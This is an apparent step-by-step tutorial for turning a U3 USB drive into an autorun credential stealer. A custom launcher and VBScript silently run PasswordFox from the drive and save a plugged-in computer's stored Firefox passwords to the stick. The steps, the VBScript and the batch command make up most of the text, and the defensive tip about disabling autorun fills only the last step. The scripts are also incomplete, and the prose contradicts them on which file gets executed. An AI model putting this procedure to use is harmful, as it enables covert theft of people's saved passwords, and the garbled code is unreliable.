Step 1: Material List
To do this project, you are going to need:
- U3 usb drive, such as a sandisk cruizer,
- Access to a Windows XP machine.
What makes a U3 usb drive unique is that it emulates a CD rom drive so that it can autorun it's "launchpad" whenever you plug it into your computer. This is useful because Windows will not allow programs to autorun straight from a USB drive, but it will allow programs to autorun from CD drives and since a U3 usb drive shows up as both, we can use this feature to autorun our USB drive.
Step 2: Download Universal Customizer
Backup everything that's currently on your USB drive. Then go to this website: http://www.u3community.com/viewtopic.php?t=434 and download the "Universal Customizer" program. This program is going to allow us to replace the U3 Launchpad application with our own autolaunching application. Unfortunately, this program only works on Windows XP, so you'll have to have an XP machine to run this. When it's through downloading, extract all of the files to your desktop and open up the "U3CUSTOM" folder. This folder is where we're going to create our custom autolaunching program
Step 3: Creating the Autorun and Launch Files
Then click File > Save. This will autorun a program called "launch.exe" that we're going to make right now. So right click in the folder again and select "new>textdocument" and rename it "launch.bat". Then right click on it and select "edit". Now type:
Save, and close it. This will tell it to open a file called "usb.vbs" that we will create in a second. But first we need to convert the batch file to an executable that Windows can autorun.
Step 4: Converting BAT to EXE
To convert launch.bat to an executable, go to this website http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html and download the Bat to EXE converter. Open it up and run the exe file. For the "Batch file" field, point to the "launch.bat" file that you created. Then click "compile". You should now see a "launch.exe" file in your "U3Custom" folder.
Step 5: Creating the USB.vbs Script
Dim oFSO, oDrive,objFolder,oUsbDrive,oDestination, shell
oDestination = "c:\test"
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
'Get USB drive letter
For Each oDrive In oFSO.Drives
If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> "A" Then
WScript.Echo "found usb at", oDrive.DriveLetter
oUsbDrive = oDrive.DriveLetter & ":\"
shell.run oDrive.DriveLetter & ":\PasswordFox.exe"
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo "Copying File",Files
'Recursive copy, uncomment if needed
' For Each oDir In objFolder.SubFolders
' CopyFiles oDir.Path, oDst
Basically what this script does is scan the computer for a USB drive and then executes a file called "batch.bat" from that USB drive. Once you have that done, click save and exit and now we can burn this to our U3 drive.
Step 6: Burn the Files to the Virtual U3 CD
Go back up to the main "universal customizer" directory and click "isocreate.cmd". This will turn our folder into an iso file that we will then put on the USB drive. Now click on "universal_customizer.exe". Just follow the instructions in the program and it will set up your U3 drive to run our custom created launcher. When it's through, click done. You will need to pull out your usb drive and plug it back in and it may give you an error, but that's because we haven't put any programs on it, which we will do in the next step.
Step 7: Loading the Hacking Programs
start %~dp0PasswordFox.exe /shtml %~dp0firefox.html
you want to replace "PasswordFox.exe" with whatever program you downloaded. And according to the nirsoft website that we downloaded it from, if we want to save the password results as an html file, we can type /shtml firefox.html. Now to make sure that it reads it and saves it to the USB drive, we need to put "%~dp0" before both filenames. Now save the file and test it out. Put it in a computer that has autorun enabled and within a second, you should have an html file saved to your USB drive with the users information.
Step 8: Protection
The best way to protect yourself from this type of hack is to disable any type of autorun feature. To enable/disable autorun in windows xp, go to "start > run" type gpedit.msc and hit enter. Select "Administrative Templates > System" and then double click on "Turn off autoplay" to enable/disable it. In vista and 7 go to start and type "gpedit.msc", select administrative templates > Windows Components" and double click on "Autoplay policies" to enable or disable it.